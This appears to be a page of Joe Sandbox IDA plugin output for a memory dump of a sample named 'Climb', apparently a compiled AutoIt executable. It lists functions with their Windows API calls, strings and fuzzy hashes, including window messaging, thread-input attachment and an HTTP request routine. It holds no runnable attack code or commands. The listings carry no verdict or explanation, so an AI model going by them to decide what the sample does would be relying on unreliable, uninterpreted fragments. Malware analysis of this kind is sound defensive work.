Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: bd188ad898375464bdf98ba7858bf9865523fe1e5704b6766d0d8ae0acb4fb51
Instruction ID: c679a31e16f785e5c24c04662447ef191e444f9e1cf0e70037e66eeb08ae567c
Opcode Fuzzy Hash: bd188ad898375464bdf98ba7858bf9865523fe1e5704b6766d0d8ae0acb4fb51
Instruction Fuzzy Hash: F4416779A01209AFEB24DF64D894EEA7BB6FF1A314F144028FA4597390C770A954DF60

Function 004E282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

Part of subcall function 004E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004E4620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 004E28B1
GetDlgCtrlID.USER32 ref: 004E28BC
GetParent.USER32 ref: 004E28D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 004E28DB
GetDlgCtrlID.USER32(?), ref: 004E28E4
GetParent.USER32(?), ref: 004E28F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 004E28FB

Strings

ListBox, xrefs: 004E286E
ComboBox, xrefs: 004E2839

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: fa0e97ca3dcf15002beba01fa26b29e9042b900645b9dbb1303f51a9a5e8b47b
Instruction ID: 6babc52b96f791f6732f278b48eb1b6d190237a9af07ea40c12fdb8e748d6b10
Opcode Fuzzy Hash: fa0e97ca3dcf15002beba01fa26b29e9042b900645b9dbb1303f51a9a5e8b47b
Instruction Fuzzy Hash: 4F21C574900218BFCF01ABA1CC85EEEBBB8EF15355F00451BB95193291DB794809DB64

Function 004E290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

Part of subcall function 004E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004E4620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 004E2990
GetDlgCtrlID.USER32 ref: 004E299B
GetParent.USER32 ref: 004E29B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 004E29BA
GetDlgCtrlID.USER32(?), ref: 004E29C3
GetParent.USER32(?), ref: 004E29D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 004E29DA

Strings

ListBox, xrefs: 004E294F
ComboBox, xrefs: 004E291A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 58fa8072937369e6e709722c7c74e28a911d929a66a0b8515a47abd2d8800358
Instruction ID: 14af930ab8ed18b626a570afce742d448baeb086c09276d3a0682348815ead21
Opcode Fuzzy Hash: 58fa8072937369e6e709722c7c74e28a911d929a66a0b8515a47abd2d8800358
Instruction Fuzzy Hash: 8C2192B5A00214BBCF01ABA1CC85EEEBBB8EF15345F004417B95197292CB794809DB64

Function 005144BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00514539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0051453C
GetWindowLongW.USER32(?,000000F0), ref: 00514563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00514586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 005145FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00514648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00514663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0051467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00514692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 005146AF

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 958f20d397b586d838fb6ca3f46c769eb968bb49f0fe82c383b6bc209fe023ae
Instruction ID: 6e37583b322978e44f9c8fb29d69f3ca4315a2ff4294617cc90678dd9fca5cdd
Opcode Fuzzy Hash: 958f20d397b586d838fb6ca3f46c769eb968bb49f0fe82c383b6bc209fe023ae
Instruction Fuzzy Hash: 7E615975A00208AFEB10DFA4CC81EEE7BB8BF4A714F10415AFA14A73A1C774A985DF50

Function 004EBAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004EBB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,004EABA8,?,00000001), ref: 004EBB2C
GetWindowThreadProcessId.USER32(00000000), ref: 004EBB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004EABA8,?,00000001), ref: 004EBB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 004EBB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004EABA8,?,00000001), ref: 004EBB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004EABA8,?,00000001), ref: 004EBB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004EABA8,?,00000001), ref: 004EBBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004EABA8,?,00000001), ref: 004EBBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004EABA8,?,00000001), ref: 004EBBE4

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: aaa96e628e0297a38f639d5fd7e07b2cd55eb03fe3752535c0c5b736c65395ce
Instruction ID: 4d72ae6e229921dae6041dfb54e82a9928a64c92240388dd44dd47569b16db79
Opcode Fuzzy Hash: aaa96e628e0297a38f639d5fd7e07b2cd55eb03fe3752535c0c5b736c65395ce
Instruction Fuzzy Hash: B231A471904308AFDB109B95DC98FAB37B9EB24317F108006FA058A2E4C778B844DFA4

Function 004B2FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004B3007

Part of subcall function 004B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,004BDB51,00551DC4,00000000,00551DC4,00000000,?,004BDB78,00551DC4,00000007,00551DC4,?,004BDF75,00551DC4), ref: 004B2D4E
Part of subcall function 004B2D38: GetLastError.KERNEL32(00551DC4,?,004BDB51,00551DC4,00000000,00551DC4,00000000,?,004BDB78,00551DC4,00000007,00551DC4,?,004BDF75,00551DC4,00551DC4), ref: 004B2D60

_free.LIBCMT ref: 004B3013
_free.LIBCMT ref: 004B301E
_free.LIBCMT ref: 004B3029
_free.LIBCMT ref: 004B3034
_free.LIBCMT ref: 004B303F
_free.LIBCMT ref: 004B304A
_free.LIBCMT ref: 004B3055
_free.LIBCMT ref: 004B3060
_free.LIBCMT ref: 004B306E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 03b70e8b71dbdfdaf59dbbcb25736a9ebd853fa45df5f4c02a2e68e45e8b37d1
Instruction ID: 80f2eb9ac5405f38df9885fd6008f9e9269ad6e5d67a48b16abe39fb8de862d7
Opcode Fuzzy Hash: 03b70e8b71dbdfdaf59dbbcb25736a9ebd853fa45df5f4c02a2e68e45e8b37d1
Instruction Fuzzy Hash: 1E11CE76200108BFCB01EF96C942CDE3B79FF05354B81485AF9089F132D679DE519B64

Function 00504F80 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005050A5
VariantInit.OLEAUT32(?), ref: 005051A6
VariantClear.OLEAUT32(?), ref: 005051B0
VariantClear.OLEAUT32(?), ref: 0050520D

Strings

Null Object assignment in FOR..IN loop, xrefs: 00505035, 00505163, 0050521B
Incorrect Object type in FOR..IN loop, xrefs: 00505189
_NewEnum, xrefs: 00504F8E
get__NewEnum, xrefs: 00504FAC

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
API String ID: 2610073882-1765764032
Opcode ID: 0e756f22683e8e0a94765ea987afec575b959b2a8b8ba9e6be58d49e8feee240
Instruction ID: 5540c5d4443bd4b30b97fae1a2ca2399654d4cc35608026db672e6f14289ec38
Opcode Fuzzy Hash: 0e756f22683e8e0a94765ea987afec575b959b2a8b8ba9e6be58d49e8feee240
Instruction Fuzzy Hash: 7E916A71A00619ABDF20CFA5C888FAFBFB8BF45714F14855AF515AB280E7709945CFA0

Function 004F8835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004F89F2
SetCurrentDirectoryW.KERNEL32(?), ref: 004F8A06
GetFileAttributesW.KERNEL32(?), ref: 004F8A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 004F8A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 004F8A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 004F8AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004F8AF5

Strings

*.*, xrefs: 004F8AAB

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 24a2ffb836618e74846591636c823446b403e4d932e08c0c5f0560a321012ac0
Instruction ID: 96543bd14bb7bfd261ac49c869019ff675ee2ced7342fe1b29a8c66cfca27c71
Opcode Fuzzy Hash: 24a2ffb836618e74846591636c823446b403e4d932e08c0c5f0560a321012ac0
Instruction Fuzzy Hash: A081BDB19042089BCB20EF15C840ABFB3E8FF94310F54481FFA95DB250EB78D9458B9A

Function 004E5703 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 223comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 004E58AF

Strings

AutoIt3GUI, xrefs: 004E5817
bN, xrefs: 004E5823
0$U, xrefs: 004E5952
bN, xrefs: 004E57EE
bN, xrefs: 004E5806
Container, xrefs: 004E581E
:bN, xrefs: 004E57D3

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ContainedObject
String ID: bN$bN$bN$0$U$:bN$AutoIt3GUI$Container
API String ID: 3565006973-1602170989
Opcode ID: 5f54de680139fad254b8a30da765a000a14c1fabc84b251f88780248bd3c895c
Instruction ID: 7a831b982dc16f991dfca5b9197d719eb7b1e638e59c3b8ae0ed73bf3f90ba75
Opcode Fuzzy Hash: 5f54de680139fad254b8a30da765a000a14c1fabc84b251f88780248bd3c895c
Instruction Fuzzy Hash: 578189B0600601EFDB14DF55C884BAABBF8FF49719F10856EF94A8B291DB74E841CB64

Function 005188F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00518992
IsWindowEnabled.USER32(00000000), ref: 0051899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00518A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00518AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00518AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00518B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00518B1E

Strings

(U, xrefs: 005189D5

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID: (U
API String ID: 4072528602-2725093197
Opcode ID: ce5b0e77c64b938b6c9a697d07ebbf9cbd01ccad58cd9620b0caa410ad63de76
Instruction ID: ade90e23de33e7891633c7f9f27425a23ce6515f1b9fffd2330c07e3694c9c46
Opcode Fuzzy Hash: ce5b0e77c64b938b6c9a697d07ebbf9cbd01ccad58cd9620b0caa410ad63de76
Instruction Fuzzy Hash: B8716774604204AFEB319F64C894FFABFB9FF59310F14445AE845A72A1CB31AD88DB51

Function 00487447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 004874D7

Part of subcall function 00487567: GetClientRect.USER32(?,?), ref: 0048758D
Part of subcall function 00487567: GetWindowRect.USER32(?,?), ref: 004875CE
Part of subcall function 00487567: ScreenToClient.USER32(?,?), ref: 004875F6

GetDC.USER32 ref: 004C6083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004C6096
SelectObject.GDI32(00000000,00000000), ref: 004C60A4
SelectObject.GDI32(00000000,00000000), ref: 004C60B9
ReleaseDC.USER32(?,00000000), ref: 004C60C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004C6152

Strings

U, xrefs: 004C6021

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 05504a19b2e43c3d610e36a8bd3b352e99430f7efd7e97d20e397286541b1488
Instruction ID: 80dc583ce43367f1c317bc3090ff389f05e286878a87af57dcd2208fa2061170
Opcode Fuzzy Hash: 05504a19b2e43c3d610e36a8bd3b352e99430f7efd7e97d20e397286541b1488
Instruction Fuzzy Hash: 1D71DF38404205DFCF21DF64C894EBA3BB1FF45321F28866EED55562A6C739C881EB55

Function 004BB308 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004C1DEF), ref: 004BB32B

Strings

asin, xrefs: 004BB497
log, xrefs: 004BB3D1, 004BB3DD
exp, xrefs: 004BB3F0, 004BB452
log10, xrefs: 004BB375, 004BB3C5
pow, xrefs: 004BB40F, 004BB4BB, 004BB4CE
sqrt, xrefs: 004BB4AF
acos, xrefs: 004BB4A3

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 61ce4df601c913c4a7e9c9e20552f6e4bbe3e70bfd849a3172c548ced93e52c1
Instruction ID: da17920e05b36807c57c9d7e8fde6db6cf99d815c34a3349ac8829c17722575c
Opcode Fuzzy Hash: 61ce4df601c913c4a7e9c9e20552f6e4bbe3e70bfd849a3172c548ced93e52c1
Instruction Fuzzy Hash: 93517270900509DBCF14DF68E9485ED7BF0FF09304F544186D881A7264CBB98E259BBD

Function 00514322 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 005143C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 005143D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 005143F0
_wcslen.LIBCMT ref: 00514435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00514462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00514490

Strings

SysListView32, xrefs: 00514393
-----, xrefs: 00514443

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: -----$SysListView32
API String ID: 2147712094-3975388722
Opcode ID: 79ec65645b8f7000602c24c1109057f0ee919ca015309bf2b33850c506d0cef7
Instruction ID: f3adaabfafb78c45165fcad1244177123ff22708a0948f921d242890a96b9ed8
Opcode Fuzzy Hash: 79ec65645b8f7000602c24c1109057f0ee919ca015309bf2b33850c506d0cef7
Instruction Fuzzy Hash: 4041BB31A00309ABEF219F64CC49BEA7BA9FB48350F10152AF918A7291D7B59DC4DB90

Function 004FCC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004FCCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004FCCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004FCD0F
GetLastError.KERNEL32 ref: 004FCD67
SetEvent.KERNEL32(?), ref: 004FCD7B
InternetCloseHandle.WININET(00000000), ref: 004FCD86

Strings

, xrefs: 004FCD00

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: c68ae400a548dada203fadbbd5e51a53b87921e64bf06c833aa91dfa66ff6bcf
Instruction ID: ddafc9892d2765c1c65b38b686e80d66be4cad6a704dfd253ea3416d35be2b1f
Opcode Fuzzy Hash: c68ae400a548dada203fadbbd5e51a53b87921e64bf06c833aa91dfa66ff6bcf
Instruction Fuzzy Hash: 50318DB150020CAFD721AF658DC8ABF7BFCEB55744B10452EF54693240DB38D908AB79

Function 004EA215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004C55AE,?,?,Bad directive syntax error,0051DCD0,00000000,00000010,?,?), ref: 004EA236
LoadStringW.USER32(00000000,?,004C55AE,?), ref: 004EA23D

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004EA301

Strings

Error: , xrefs: 004EA2CF
., xrefs: 004EA2E7
Line %d:, xrefs: 004EA28C
Line %d (File "%s"):, xrefs: 004EA2A7
%s (%d) : ==> %s.: %s %s, xrefs: 004EA26B

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: fa779f11d5c4fd73a35ed7615c233829feed50bd069539119ce906fb19edcb19
Instruction ID: cf5d5defadd382db9b86551c2cb31ab252e158bc74b4e0a0c3981c7428482a01
Opcode Fuzzy Hash: fa779f11d5c4fd73a35ed7615c233829feed50bd069539119ce906fb19edcb19
Instruction Fuzzy Hash: FE21733180021DEFCF01BF91CC06EEE7B75FF18308F00485AB515650A2EB79A518DB55

Function 004E29EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 004E29F8
GetClassNameW.USER32(00000000,?,00000100), ref: 004E2A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004E2A9A

Strings

smallicons, xrefs: 004E2A62
SHELLDLL_DefView, xrefs: 004E2A19
details, xrefs: 004E2A48
list, xrefs: 004E2A7C
largeicons, xrefs: 004E2A2E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

